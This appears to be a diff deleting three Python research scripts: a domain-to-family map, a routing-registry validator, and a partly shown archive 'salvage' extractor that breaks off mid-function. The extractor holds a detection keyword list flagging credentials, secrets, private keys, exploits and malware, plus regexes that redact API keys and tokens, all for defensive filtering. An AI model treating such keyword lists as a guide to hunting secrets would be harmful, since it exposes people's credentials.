'TopologicalPersistence', 'AdversarialTopologyTest'],
|
|
||||||
'information_theory': ['Information Theory', 'MI Signal', 'Encoding System',
|
|
||||||
'Cartesian System', 'Emoji Machine', 'PBACS Signal',
|
|
||||||
'Combined System'],
|
|
||||||
'quantum': ['Quantum Geometry', 'Quantum Chaos', 'Quantum Biology', 'ElectronOrbitalConstraint',
|
|
||||||
'QuantumManifoldGeometry', 'QuantumAwareLean', 'QuantizationMetaprobe'],
|
|
||||||
'neural': ['Neuroscience', 'Neural Development', 'Neurodivergent', 'SpikingDynamics',
|
|
||||||
'MorphicNeuralNetwork', 'CognitiveAcoustic', 'CognitiveLearning',
|
|
||||||
'STDP', 'SpikeTimingShifter', 'STDPShifter'],
|
|
||||||
'swarm_theory': ['Swarm Coordination', 'Swarm Analysis', 'SwarmCompetition', 'SwarmDesignReview',
|
|
||||||
'SwarmCodeGeneration', 'SwarmCodeReview', 'SwarmQueryAPI', 'SwarmRGFlow',
|
|
||||||
'SwarmTopology', 'SwarmENEMiddleware', 'SwarmMoERewiring'],
|
|
||||||
'control_theory': ['Control Theory', 'Waveprobe Control', 'Waveprobe QUBO', 'KDA Control',
|
|
||||||
'Homeostatic Control', 'WaveformWaveprobePipeline', 'Waveprobe'],
|
|
||||||
'semantics': ['Semantics', 'S3C', 'S3CGeometry', 'S3CResonance', 'S3CManifoldMetaprobe',
|
|
||||||
'S3CManifoldGeometryMetaprobe', 'S3CUnifiedMetaprobe', 'SemanticMass',
|
|
||||||
'SemanticRGFlow', 'SpectralField', 'Atoms', 'Bind', 'Bounded Hierarchical Cryptographic Space'],
|
|
||||||
'scaling': ['ScaleSpace', 'Allometry', 'CorticalScaling', 'ConstructalMuscle', 'CardiacYield'],
|
|
||||||
'grammar': ['WitnessGrammar', 'Prohibited', 'Constitution', 'EpistemicHonesty',
|
|
||||||
'TriumvirateEnforcer'],
|
|
||||||
'routing': ['Routing', 'Manifold Routing', 'Manifold Networking', 'HotPathColdPath',
|
|
||||||
'RouteCost', 'AbelianSandpileRouting', 'ManifoldNetworking'],
|
|
||||||
'genomic': ['Genomic Compression', 'GenomicStoichiometric', 'SyntheticGeneticCoding',
|
|
||||||
'CodonPeptideConsistency', 'CodonOTOM', 'FibonacciEncoding'],
|
|
||||||
'compression_systems': ['Compression', 'DeltaGCL Compression', 'DeltaGCLCompression',
|
|
||||||
'CrossModalCompression', 'StreamCompression', 'CompressionControl',
|
|
||||||
'CompressionEvidence', 'CompressionLossComparison',
|
|
||||||
'CompressionMaximization', 'CompressionMechanics', 'CompressionMechanicsBridge',
|
|
||||||
'YangMillsCompression', 'YangMillsCompressionBounds', 'YangMillsLattice',
|
|
||||||
'YangMillsLatticeSizing', 'YangMillsPerformance',
|
|
||||||
'PhiShellEncoding', 'VoxelEncoding', 'CR = U_size / C_size'],
|
|
||||||
'biology_detail': ['Phonon Graph', 'Hormone Derivation', 'Cephalopod Distributed',
|
|
||||||
'Morpholino', 'miRNA_Shifter', 'TranscriptionShifter',
|
|
||||||
'TranslationShifter', 'HachimojiShifter', 'AEGISShifter',
|
|
||||||
'NaturalDNAShifter', 'PNAShifter', 'LNAShifter', 'SplicingShifter',
|
|
||||||
'PrionShifter', 'SpiegelmerShifter'],
|
|
||||||
'chaos': ['Chaotic Dynamics', 'Logistic Map', 'LogisticMapShifter', 'DSE',
|
|
||||||
'DeterministicStochasticEngine', 'Stochastic Processes', 'MasterEquation',
|
|
||||||
'PopulationChaosDynamics'],
|
|
||||||
'geometry': ['GWL Riemannian Geometry', 'GWL Rotation', 'GWL Temporal', 'GWL State Space',
|
|
||||||
'GWL Throat', 'GWL Connection', 'GWL Coordinate Charts', 'GWL Geodesic Integration',
|
|
||||||
'GWL Geodesic Integration (Integrated)', 'GWL Chiral Interaction', 'GWL Ternary State',
|
|
||||||
'Geometric Algebra', 'PIST', 'Dyson Swarm Geodesics', 'Virtual Alcubierre',
|
|
||||||
'Non-Euclidean UV QUBO', 'Manifold Dynamics', 'Constraint Geometry'],
|
|
||||||
'verification': ['Verification', 'BaselineTest', 'ConservationTest', 'CostEffectiveVerification',
|
|
||||||
'GPUVerificationMetaprobe', 'Lean4ImprovementProofs', 'AVMRProofs',
|
|
||||||
'AVMRTheorems', 'AVMRFrameworkMetaprobe', 'AVMRInformation', 'AVMR',
|
|
||||||
'AgenticTheorems', 'Constitution', 'CasimirMetaprobe', 'DiffusionSNRBias',
|
|
||||||
'DSPTranslation', 'CrossDimensionalFilter', 'EnergyGradientSignal',
|
|
||||||
'MISignal', 'HotPathColdPath', 'Adaptation Theory', 'Dynamic Canal Theory',
|
|
||||||
'ManifoldNetworking', 'CalibratedKernel'],
|
|
||||||
'network': ['Network Theory', 'Manifold Networking', 'CooperativeLUT', 'SIMDBranchPrediction',
|
|
||||||
'TopologyResilience', 'TopologyFractalEncoding', 'TopologyGoldenSpiral',
|
|
||||||
'TopologyPhinary', 'TopologyDlessScalar', 'TopologyDomainAlignment',
|
|
||||||
'TopologyNode', 'DomainKernel', 'DomainModelIntegration', 'DomainRegistryAlignment',
|
|
||||||
'DomainState', 'ConflictResolution', 'ExternalConnectors'],
|
|
||||||
'algorithms': ['Algorithms', 'SolitonSearch', 'SolitonTensor', 'Search', 'SwarmCompetition',
|
|
||||||
'TileFlipConsensus'],
|
|
||||||
'stochastic': ['Stochastic Processes', 'Stochastic PDEs', 'MasterEquation', 'PopulationChaosDynamics'],
|
|
||||||
'n_body': ['N-Space Dynamics', 'NKCoupling', 'CoulombComplexity', 'CellSnowballConstraint',
|
|
||||||
'ElectrostaticsMetaprobe'],
|
|
||||||
'origin': ['Origin', 'Emergence System', 'UniverseCollisionConsensus', 'BHOCS', 'HybridTSMPISTTorus'],
|
|
||||||
'NES': ['NES', 'AnalogDSP', 'VideoSynth', 'TemporalSuperSample', 'VirtualDisplay',
|
|
||||||
'VoltageMath', 'MinimalOISC', 'OISC', 'CartridgeOISC', 'NanoKernel',
|
|
||||||
'Metaprobe', 'UnifiedMath'],
|
|
||||||
'genetic_encoding': ['HachimojiShifter', 'AEGISShifter', 'NaturalDNAShifter',
|
|
||||||
'TranscriptionShifter', 'TranslationShifter', 'PNAShifter',
|
|
||||||
'LNAShifter', 'SplicingShifter', 'PrionShifter',
|
|
||||||
'SpiegelmerShifter', 'miRNA_Shifter', 'MorpholinoShifter',
|
|
||||||
'SyntheticGeneticCoding', 'CodonPeptideConsistency', 'CodonOTOM'],
|
|
||||||
'thermodynamics': ['Thermodynamic', 'Thermodynamics', 'Informatic Stress', 'KDA Physics',
|
|
||||||
'QCL Energy', 'BEA Thermo Bridge', 'ThermodynamicSort'],
|
|
||||||
'protein': ['Protein Folding', 'BioRxivFormalization', 'ProteinTemplate',
|
|
||||||
'Protein Binding'],
|
|
||||||
'epidemiology': ['Epidemiology', 'Epidemiological', 'EpidemiologicalTrophic'],
|
|
||||||
'oceanography': ['Oceanography', 'Marine Biology', 'Fluid Dynamics', 'Desalination'],
|
|
||||||
}
|
|
||||||
|
|
||||||
# Now build domain -> family list
|
|
||||||
domain_to_families = defaultdict(list)
|
|
||||||
assigned = set()
|
|
||||||
for domain, fams in domains_map.items():
|
|
||||||
for f in fams:
|
|
||||||
domain_to_families[domain].append(f)
|
|
||||||
assigned.add(f)
|
|
||||||
|
|
||||||
# Also build a reverse mapping for output
|
|
||||||
print("// DOMAIN EXPANSION MAP —", len(assigned), "families assigned to", len(domain_to_families), "domains")
|
|
||||||
print()
|
|
||||||
|
|
||||||
for dom in sorted(domain_to_families.keys()):
|
|
||||||
fams = domain_to_families[dom]
|
|
||||||
print(f" // {dom} — {len(fams)} families")
|
|
||||||
for f in sorted(fams):
|
|
||||||
info = fam_info.get(f, {'purposes': ['N/A']})
|
|
||||||
purp = info['purposes'][0][:80] if info['purposes'] else 'N/A'
|
|
||||||
print(f" // {f}")
|
|
||||||
|
|
@ -1,224 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""Validate Equation Forest routing registry and toy Goxel route requests.
|
|
||||||
|
|
||||||
Status: HOLD / workbench projection.
|
|
||||||
|
|
||||||
This script validates the machine-readable routing grammar. It does not prove
|
|
||||||
physics, topology, or semantic truth.
|
|
||||||
"""
|
|
||||||
|
|
||||||
from __future__ import annotations
|
|
||||||
|
|
||||||
import argparse
|
|
||||||
import json
|
|
||||||
import sys
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from pathlib import Path
|
|
||||||
from typing import Any, Iterable
|
|
||||||
|
|
||||||
REQUIRED_KERNEL_FIELDS = {
|
|
||||||
"kernel_id",
|
|
||||||
"domain_class",
|
|
||||||
"display_equation",
|
|
||||||
"variables",
|
|
||||||
"bucket",
|
|
||||||
"hyper_term",
|
|
||||||
"functional_role",
|
|
||||||
"claim_state",
|
|
||||||
"authority_scope",
|
|
||||||
"allowed_runtimes",
|
|
||||||
"blocked_usages",
|
|
||||||
"receipt_refs",
|
|
||||||
}
|
|
||||||
|
|
||||||
ALLOWED_BUCKETS = {"GEOMETRY", "FLUID", "NEURAL", "ENTROPY", "TOPOLOGY", "AUXILIARY"}
|
|
||||||
|
|
||||||
TOY_ROUTE_RULES = {
|
|
||||||
"shockwave_goxel": {
|
|
||||||
"required_buckets": {"FLUID", "ENTROPY"},
|
|
||||||
"recommended_kernels": {
|
|
||||||
"Burgers_Inviscid",
|
|
||||||
"Burgers_Viscous",
|
|
||||||
"Navier_Stokes_Incompressible",
|
|
||||||
"Shannon_Entropy",
|
|
||||||
"Landauer_Bound",
|
|
||||||
},
|
|
||||||
"description": "Shockwave Goxel should route through fluid dynamics plus entropy/cost gates.",
|
|
||||||
},
|
|
||||||
"near_miss_sidon_goxel": {
|
|
||||||
"required_buckets": {"TOPOLOGY", "ENTROPY"},
|
|
||||||
"recommended_kernels": {
|
|
||||||
"RGFlow_Admissibility",
|
|
||||||
"Genome18_Address",
|
|
||||||
"Shannon_Entropy",
|
|
||||||
"Landauer_Bound",
|
|
||||||
},
|
|
||||||
"description": "Near-miss Sidon Goxel should preserve collision metadata and route through topology plus entropy gates.",
|
|
||||||
},
|
|
||||||
"signal_surprise_goxel": {
|
|
||||||
"required_buckets": {"NEURAL", "ENTROPY"},
|
|
||||||
"recommended_kernels": {
|
|
||||||
"NII_Surprise",
|
|
||||||
"S3C_Codec",
|
|
||||||
"Shannon_Entropy",
|
|
||||||
},
|
|
||||||
"description": "Signal-surprise Goxel should route through residual/signal and entropy accounting.",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass(frozen=True)
|
|
||||||
class ValidationResult:
|
|
||||||
ok: bool
|
|
||||||
messages: list[str]
|
|
||||||
|
|
||||||
|
|
||||||
def load_json(path: Path) -> dict[str, Any]:
|
|
||||||
try:
|
|
||||||
with path.open("r", encoding="utf-8") as handle:
|
|
||||||
data = json.load(handle)
|
|
||||||
except FileNotFoundError as exc:
|
|
||||||
raise SystemExit(f"Missing file: {path}") from exc
|
|
||||||
except json.JSONDecodeError as exc:
|
|
||||||
raise SystemExit(f"Invalid JSON in {path}: {exc}") from exc
|
|
||||||
|
|
||||||
if not isinstance(data, dict):
|
|
||||||
raise SystemExit(f"Expected JSON object at root of {path}")
|
|
||||||
return data
|
|
||||||
|
|
||||||
|
|
||||||
def validate_kernel_registry(registry: dict[str, Any]) -> ValidationResult:
|
|
||||||
messages: list[str] = []
|
|
||||||
kernels = registry.get("kernels")
|
|
||||||
|
|
||||||
if not isinstance(kernels, list):
|
|
||||||
return ValidationResult(False, ["registry.kernels must be a list"])
|
|
||||||
|
|
||||||
seen: set[str] = set()
|
|
||||||
bucket_counts: dict[str, int] = {bucket: 0 for bucket in ALLOWED_BUCKETS}
|
|
||||||
|
|
||||||
for index, kernel in enumerate(kernels):
|
|
||||||
if not isinstance(kernel, dict):
|
|
||||||
messages.append(f"kernel[{index}] is not an object")
|
|
||||||
continue
|
|
||||||
|
|
||||||
missing = sorted(REQUIRED_KERNEL_FIELDS - set(kernel))
|
|
||||||
if missing:
|
|
||||||
messages.append(f"kernel[{index}] missing fields: {', '.join(missing)}")
|
|
||||||
|
|
||||||
kernel_id = kernel.get("kernel_id")
|
|
||||||
if not isinstance(kernel_id, str) or not kernel_id:
|
|
||||||
messages.append(f"kernel[{index}] has invalid kernel_id")
|
|
||||||
elif kernel_id in seen:
|
|
||||||
messages.append(f"duplicate kernel_id: {kernel_id}")
|
|
||||||
else:
|
|
||||||
seen.add(kernel_id)
|
|
||||||
|
|
||||||
bucket = kernel.get("bucket")
|
|
||||||
if bucket not in ALLOWED_BUCKETS:
|
|
||||||
messages.append(f"kernel {kernel_id!r} has invalid bucket: {bucket!r}")
|
|
||||||
else:
|
|
||||||
bucket_counts[bucket] += 1
|
|
||||||
|
|
||||||
if kernel.get("claim_state") not in {"HOLD", "V_scope", "REVIEWED", "CANONICAL_LEAN", "QUARANTINE"}:
|
|
||||||
messages.append(f"kernel {kernel_id!r} has invalid claim_state: {kernel.get('claim_state')!r}")
|
|
||||||
|
|
||||||
if kernel.get("authority_scope") not in {
|
|
||||||
"workbench_projection",
|
|
||||||
"simulation_only",
|
|
||||||
"receipt_backed",
|
|
||||||
"canonical_lean",
|
|
||||||
"external_source",
|
|
||||||
"safety_policy",
|
|
||||||
}:
|
|
||||||
messages.append(f"kernel {kernel_id!r} has invalid authority_scope: {kernel.get('authority_scope')!r}")
|
|
||||||
|
|
||||||
if len(seen) != 15:
|
|
||||||
messages.append(f"expected 15 kernels, found {len(seen)}")
|
|
||||||
|
|
||||||
for required_bucket in {"FLUID", "NEURAL", "ENTROPY", "TOPOLOGY"}:
|
|
||||||
if bucket_counts[required_bucket] == 0:
|
|
||||||
messages.append(f"required bucket has no kernels: {required_bucket}")
|
|
||||||
|
|
||||||
if messages:
|
|
||||||
return ValidationResult(False, messages)
|
|
||||||
|
|
||||||
return ValidationResult(True, ["kernel registry passed structural validation"])
|
|
||||||
|
|
||||||
|
|
||||||
def kernel_index(registry: dict[str, Any]) -> dict[str, dict[str, Any]]:
|
|
||||||
return {kernel["kernel_id"]: kernel for kernel in registry.get("kernels", []) if isinstance(kernel, dict) and "kernel_id" in kernel}
|
|
||||||
|
|
||||||
|
|
||||||
def buckets_for_kernels(kernels: Iterable[str], index: dict[str, dict[str, Any]]) -> set[str]:
|
|
||||||
buckets: set[str] = set()
|
|
||||||
for kernel_id in kernels:
|
|
||||||
kernel = index.get(kernel_id)
|
|
||||||
if kernel:
|
|
||||||
buckets.add(str(kernel.get("bucket")))
|
|
||||||
return buckets
|
|
||||||
|
|
||||||
|
|
||||||
def validate_toy_route(registry: dict[str, Any], route_name: str, selected_kernels: list[str] | None) -> ValidationResult:
|
|
||||||
messages: list[str] = []
|
|
||||||
rules = TOY_ROUTE_RULES.get(route_name)
|
|
||||||
if rules is None:
|
|
||||||
valid = ", ".join(sorted(TOY_ROUTE_RULES))
|
|
||||||
return ValidationResult(False, [f"unknown route {route_name!r}; valid routes: {valid}"])
|
|
||||||
|
|
||||||
index = kernel_index(registry)
|
|
||||||
selected = set(selected_kernels or rules["recommended_kernels"])
|
|
||||||
|
|
||||||
unknown = sorted(kernel for kernel in selected if kernel not in index)
|
|
||||||
if unknown:
|
|
||||||
messages.append(f"unknown selected kernels: {', '.join(unknown)}")
|
|
||||||
|
|
||||||
actual_buckets = buckets_for_kernels(selected, index)
|
|
||||||
missing_buckets = set(rules["required_buckets"]) - actual_buckets
|
|
||||||
if missing_buckets:
|
|
||||||
messages.append(f"route {route_name} missing required buckets: {', '.join(sorted(missing_buckets))}")
|
|
||||||
|
|
||||||
for kernel_id in sorted(selected):
|
|
||||||
kernel = index.get(kernel_id)
|
|
||||||
if not kernel:
|
|
||||||
continue
|
|
||||||
if "toy_route_validator" not in kernel.get("allowed_runtimes", []):
|
|
||||||
messages.append(f"kernel {kernel_id} is not marked for toy_route_validator runtime")
|
|
||||||
|
|
||||||
if messages:
|
|
||||||
return ValidationResult(False, messages)
|
|
||||||
|
|
||||||
return ValidationResult(True, [
|
|
||||||
rules["description"],
|
|
||||||
f"selected kernels: {', '.join(sorted(selected))}",
|
|
||||||
f"covered buckets: {', '.join(sorted(actual_buckets))}",
|
|
||||||
"route passed routing-grammar validation only; no physical/theorem claim is implied",
|
|
||||||
])
|
|
||||||
|
|
||||||
|
|
||||||
def main(argv: list[str]) -> int:
|
|
||||||
parser = argparse.ArgumentParser(description="Validate Equation Forest routing registry and toy routes.")
|
|
||||||
parser.add_argument("--registry", type=Path, default=Path("registry/equation_forest_kernels.json"))
|
|
||||||
parser.add_argument("--route", choices=sorted(TOY_ROUTE_RULES), help="Optional toy route to validate")
|
|
||||||
parser.add_argument("--kernels", nargs="*", help="Optional explicit kernel IDs for route validation")
|
|
||||||
args = parser.parse_args(argv)
|
|
||||||
|
|
||||||
registry = load_json(args.registry)
|
|
||||||
structural = validate_kernel_registry(registry)
|
|
||||||
for message in structural.messages:
|
|
||||||
print(message)
|
|
||||||
if not structural.ok:
|
|
||||||
return 1
|
|
||||||
|
|
||||||
if args.route:
|
|
||||||
route_result = validate_toy_route(registry, args.route, args.kernels)
|
|
||||||
for message in route_result.messages:
|
|
||||||
print(message)
|
|
||||||
if not route_result.ok:
|
|
||||||
return 2
|
|
||||||
|
|
||||||
return 0
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
raise SystemExit(main(sys.argv[1:]))
|
|
||||||
|
|
@ -1,421 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
ENE Artifact Salvage Extractor
|
|
||||||
==============================
|
|
||||||
|
|
||||||
Purpose
|
|
||||||
-------
|
|
||||||
Extract useful, sanitized research artifacts from legacy ENE archive records
|
|
||||||
without carrying forward false claims, contaminated phrasing, or obsolete math.
|
|
||||||
|
|
||||||
Core rule
|
|
||||||
---------
|
|
||||||
Wrong math may still contain a valid artifact. Salvage the artifact, not the
|
|
||||||
false claim.
|
|
||||||
|
|
||||||
This tool is deliberately conservative. It does not emit the old claim body by
|
|
||||||
default. It emits sanitized receipts containing only:
|
|
||||||
|
|
||||||
- provenance pointers and hashes;
|
|
||||||
- classification of why the record is interesting;
|
|
||||||
- sanitized reusable core;
|
|
||||||
- failure/contamination flags;
|
|
||||||
- current-stack mapping hints;
|
|
||||||
- non-claims.
|
|
||||||
|
|
||||||
It is intended for legacy review passes where the operator does not want old
|
|
||||||
patterns to infect current reasoning.
|
|
||||||
"""
|
|
||||||
|
|
||||||
from __future__ import annotations
|
|
||||||
|
|
||||||
import argparse
|
|
||||||
import dataclasses
|
|
||||||
import hashlib
|
|
||||||
import json
|
|
||||||
import re
|
|
||||||
from pathlib import Path
|
|
||||||
from typing import Any, Dict, Iterable, List, Optional, Tuple
|
|
||||||
|
|
||||||
|
|
||||||
EXTRACTION_VERSION = "ene_artifact_salvage_extractor_v0.1"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclasses.dataclass(frozen=True)
|
|
||||||
class SalvageConfig:
|
|
||||||
max_records: Optional[int]
|
|
||||||
min_score: int
|
|
||||||
include_rejected: bool
|
|
||||||
emit_legacy_snippets: bool
|
|
||||||
|
|
||||||
|
|
||||||
@dataclasses.dataclass
|
|
||||||
class SalvageReceipt:
|
|
||||||
salvage_id: str
|
|
||||||
source_archive_id: str
|
|
||||||
source_type: str
|
|
||||||
source_file: str
|
|
||||||
source_hash: str
|
|
||||||
extraction_version: str
|
|
||||||
interest_score: int
|
|
||||||
salvage_class: str
|
|
||||||
interest_reasons: List[str]
|
|
||||||
contamination_flags: List[str]
|
|
||||||
sanitized_core: str
|
|
||||||
current_stack_mapping: Dict[str, List[str]]
|
|
||||||
recommended_next_action: str
|
|
||||||
allowed_claims: List[str]
|
|
||||||
non_claims: List[str]
|
|
||||||
legacy_snippet: Optional[str] = None
|
|
||||||
|
|
||||||
|
|
||||||
def stable_hash(obj: Any, n: int = 32) -> str:
|
|
||||||
data = json.dumps(obj, sort_keys=True, ensure_ascii=False, default=str)
|
|
||||||
return hashlib.sha256(data.encode("utf-8")).hexdigest()[:n]
|
|
||||||
|
|
||||||
|
|
||||||
def load_archive(path: Path) -> List[Dict[str, Any]]:
|
|
||||||
archive = json.loads(path.read_text(encoding="utf-8"))
|
|
||||||
records = archive.get("records", archive)
|
|
||||||
if isinstance(records, dict):
|
|
||||||
return list(records.values())
|
|
||||||
if isinstance(records, list):
|
|
||||||
return records
|
|
||||||
raise ValueError("Archive must contain records as a dict or list")
|
|
||||||
|
|
||||||
|
|
||||||
INTEREST_PATTERNS: Dict[str, List[str]] = {
|
|
||||||
"compression_invariant": [
|
|
||||||
r"compression", r"codec", r"entropy", r"hutter", r"canonical", r"precompression",
|
|
||||||
r"arithmetic coding", r"log[- ]?loss", r"minimum description", r"md[l]",
|
|
||||||
],
|
|
||||||
"manifold_topology": [
|
|
||||||
r"manifold", r"topolog", r"torsion", r"curvature", r"ricci", r"fiber",
|
|
||||||
r"bundle", r"geodesic", r"metric", r"basin", r"attractor",
|
|
||||||
],
|
|
||||||
"avm_or_bytecode": [
|
|
||||||
r"\bAVM\b", r"bytecode", r"stack", r"kernel", r"trace", r"q16", r"fixed[- ]?point",
|
|
||||||
r"deterministic", r"golden trace",
|
|
||||||
],
|
|
||||||
"nuvmap_addressing": [
|
|
||||||
r"NUVMAP", r"address", r"projection", r"virtual memory", r"uv map", r"coordinate",
|
|
||||||
r"spectral mode", r"witness", r"receipt",
|
|
||||||
],
|
|
||||||
"s3c_sphinx_gcl": [
|
|
||||||
r"S3C", r"AngrySphinx", r"sphinx", r"GCL", r"grammar", r"lawful", r"gate",
|
|
||||||
r"quarantine", r"scar", r"throttle", r"shell",
|
|
||||||
],
|
|
||||||
"photonic_witness": [
|
|
||||||
r"photonic", r"photon", r"Quandela", r"Perceval", r"boson", r"HOM", r"linear optical",
|
|
||||||
r"spectral witness", r"sampling",
|
|
||||||
],
|
|
||||||
"lean_formalization": [
|
|
||||||
r"Lean", r"theorem", r"proof", r"sorry", r"formal", r"lemma", r"lake build",
|
|
||||||
r"Q16_16", r"Semantics\.",
|
|
||||||
],
|
|
||||||
"hardware_loopback": [
|
|
||||||
r"FPGA", r"Tang Nano", r"UART", r"loopback", r"hardware", r"synthesis", r"bit[- ]?exact",
|
|
||||||
r"Verilog", r"RTL",
|
|
||||||
],
|
|
||||||
"negative_control_or_failure": [
|
|
||||||
r"failed", r"wrong", r"gap", r"limitation", r"counterexample", r"negative control",
|
|
||||||
r"overclaim", r"not prove", r"boundary", r"quarantine",
|
|
||||||
],
|
|
||||||
"cross_domain_adapter": [
|
|
||||||
r"adapter", r"cross[- ]?domain", r"translation", r"mapping", r"homology", r"equivalence",
|
|
||||||
r"route", r"bridge", r"workflow", r"process graph",
|
|
||||||
],
|
|
||||||
"mass_number_diat": [
|
|
||||||
r"DIAT", r"mass number", r"square", r"shell", r"gap", r"parity", r"mirror",
|
|
||||||
r"codon", r"distance to", r"integer",
|
|
||||||
],
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
CONTAMINATION_PATTERNS: Dict[str, List[str]] = {
|
|
||||||
"proof_inflation": [
|
|
||||||
r"proved.*navier", r"proved.*millennium", r"solved.*burgers", r"solved.*navier",
|
|
||||||
r"global regularity", r"proof of everything", r"final theorem",
|
|
||||||
],
|
|
||||||
"physics_overclaim": [
|
|
||||||
r"actual mass", r"semantic mass is physical", r"quantum advantage", r"photonic.*solve",
|
|
||||||
r"violates", r"free energy", r"perpetual",
|
|
||||||
],
|
|
||||||
"ai_as_validator": [
|
|
||||||
r"LLM.*proved", r"AI.*validated", r"model agrees therefore", r"consensus of models",
|
|
||||||
],
|
|
||||||
"float_hot_path": [
|
|
||||||
r"float.*hot", r"f32", r"f64", r"floating point.*authoritative",
|
|
||||||
],
|
|
||||||
"unsafe_or_sensitive": [
|
|
||||||
r"credential", r"token", r"secret", r"private key", r"password", r"exploit", r"payload",
|
|
||||||
r"dox", r"retaliat", r"malware",
|
|
||||||
],
|
|
||||||
"medical_or_financial_overclaim": [
|
|
||||||
r"cures", r"diagnoses", r"guaranteed profit", r"market oracle", r"investment advice",
|
|
||||||
],
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
STACK_MAPPING: Dict[str, List[Tuple[str, str]]] = {
|
|
||||||
"nuvmap": [
|
|
||||||
("nuvmap_addressing", "Candidate for address/projection receipt or non-uniform routing surface"),
|
|
||||||
("photonic_witness", "Project witness statistics into addressable spectral coordinates"),
|
|
||||||
("hardware_loopback", "Project hardware trace locations into NUVMAP receipt space"),
|
|
||||||
],
|
|
||||||
"avm": [
|
|
||||||
("avm_or_bytecode", "Candidate for deterministic Q16.16 scoring or trace replay"),
|
|
||||||
("compression_invariant", "Candidate for AVM kernel scoring/compression law test"),
|
|
||||||
("hardware_loopback", "Candidate for bit-exact replay target"),
|
|
||||||
],
|
|
||||||
"s3c": [
|
|
||||||
("s3c_sphinx_gcl", "Candidate for shell/codon expansion gate"),
|
|
||||||
("mass_number_diat", "Candidate for shell pressure or square-gap codonization"),
|
|
||||||
("cross_domain_adapter", "Candidate route through compressed adapter space"),
|
|
||||||
],
|
|
||||||
"metaprobe": [
|
|
||||||
("negative_control_or_failure", "Candidate failure surface / harder probe family"),
|
|
||||||
("cross_domain_adapter", "Candidate for adapter stress-test generation"),
|
|
||||||
],
|
|
||||||
"gcl": [
|
|
||||||
("s3c_sphinx_gcl", "Candidate grammar/lawfulness boundary"),
|
|
||||||
("negative_control_or_failure", "Candidate claim-boundary rule or forbidden region"),
|
|
||||||
],
|
|
||||||
"lean": [
|
|
||||||
("lean_formalization", "Candidate local theorem or proof-boundary target"),
|
|
||||||
("avm_or_bytecode", "Candidate bytecode correctness theorem"),
|
|
||||||
],
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
SAFE_WORD_REPLACEMENTS = [
|
|
||||||
(re.compile(r"\bproved\b", re.I), "claimed"),
|
|
||||||
(re.compile(r"\bsolved\b", re.I), "attempted"),
|
|
||||||
(re.compile(r"\bguarantees?\b", re.I), "suggests"),
|
|
||||||
(re.compile(r"\bquantum advantage\b", re.I), "photonic sampling behavior"),
|
|
||||||
(re.compile(r"\bglobal regularity\b", re.I), "bounded formal target"),
|
|
||||||
]
|
|
||||||
|
|
||||||
|
|
||||||
def normalize_text(record: Dict[str, Any]) -> str:
|
|
||||||
text = record.get("extracted_text")
|
|
||||||
if not text:
|
|
||||||
raw = record.get("raw_content", {})
|
|
||||||
text = json.dumps(raw, ensure_ascii=False, default=str)
|
|
||||||
text = str(text)
|
|
||||||
# Remove obvious secret-like long tokens from any optional legacy snippet path.
|
|
||||||
text = re.sub(r"(?i)(api[_-]?key|token|password|secret)\s*[:=]\s*[^\s]+", r"\1: [REDACTED]", text)
|
|
||||||
text = re.sub(r"[A-Za-z0-9_\-]{48,}", "[LONG_TOKEN_REDACTED]", text)
|
|
||||||
return text
|
|
||||||
|
|
||||||
|
|
||||||
def match_categories(text: str, patterns: Dict[str, List[str]]) -> Dict[str, int]:
|
|
||||||
out: Dict[str, int] = {}
|
|
||||||
for category, pats in patterns.items():
|
|
||||||
count = 0
|
|
||||||
for pat in pats:
|
|
||||||
count += len(re.findall(pat, text, flags=re.I))
|
|
||||||
if count:
|
|
||||||
out[category] = count
|
|
||||||
return out
|
|
||||||
|
|
||||||
|
|
||||||
def summarize_core(categories: Dict[str, int], contamination: Dict[str, int]) -> str:
|
|
||||||
if not categories:
|
|
||||||
return "No sanitized reusable core detected by the current rules."
|
|
||||||
|
|
||||||
ordered = sorted(categories.items(), key=lambda kv: (-kv[1], kv[0]))
|
|
||||||
top = [k for k, _ in ordered[:4]]
|
|
||||||
|
|
||||||
phrases = []
|
|
||||||
if "compression_invariant" in top:
|
|
||||||
phrases.append("compression/invariant extraction candidate")
|
|
||||||
if "manifold_topology" in top:
|
|
||||||
phrases.append("manifold or topological structure candidate")
|
|
||||||
if "avm_or_bytecode" in top:
|
|
||||||
phrases.append("deterministic AVM/bytecode scoring candidate")
|
|
||||||
if "nuvmap_addressing" in top:
|
|
||||||
phrases.append("NUVMAP address/projection candidate")
|
|
||||||
if "s3c_sphinx_gcl" in top:
|
|
||||||
phrases.append("S3C/GCL/AngrySphinx routing candidate")
|
|
||||||
if "photonic_witness" in top:
|
|
||||||
phrases.append("photonic witness or sampling candidate")
|
|
||||||
if "lean_formalization" in top:
|
|
||||||
phrases.append("Lean/formalization target candidate")
|
|
||||||
if "hardware_loopback" in top:
|
|
||||||
phrases.append("hardware loopback or bit-exact replay candidate")
|
|
||||||
if "negative_control_or_failure" in top:
|
|
||||||
phrases.append("failure surface / negative-control candidate")
|
|
||||||
if "cross_domain_adapter" in top:
|
|
||||||
phrases.append("cross-domain adapter candidate")
|
|
||||||
if "mass_number_diat" in top:
|
|
||||||
phrases.append("DIAT/mass-number shell-pressure candidate")
|
|
||||||
|
|
||||||
if not phrases:
|
|
||||||
phrases = [k.replace("_", " ") for k in top]
|
|
||||||
|
|
||||||
sentence = "Sanitized artifact core: " + "; ".join(phrases) + "."
|
|
||||||
if contamination:
|
|
||||||
sentence += " Original claim language requires quarantine before reuse."
|
|
||||||
return sentence
|
|
||||||
|
|
||||||
|
|
||||||
def salvage_class(categories: Dict[str, int], contamination: Dict[str, int], score: int) -> str:
|
|
||||||
if contamination.get("unsafe_or_sensitive"):
|
|
||||||
return "QUARANTINE_ONLY"
|
|
||||||
if contamination and categories:
|
|
||||||
return "SALVAGEABLE_CORE_WITH_CLAIM_SCAR"
|
|
||||||
if categories.get("negative_control_or_failure"):
|
|
||||||
return "NEGATIVE_CONTROL_OR_FAILURE_SURFACE"
|
|
||||||
if categories.get("cross_domain_adapter") or categories.get("mass_number_diat"):
|
|
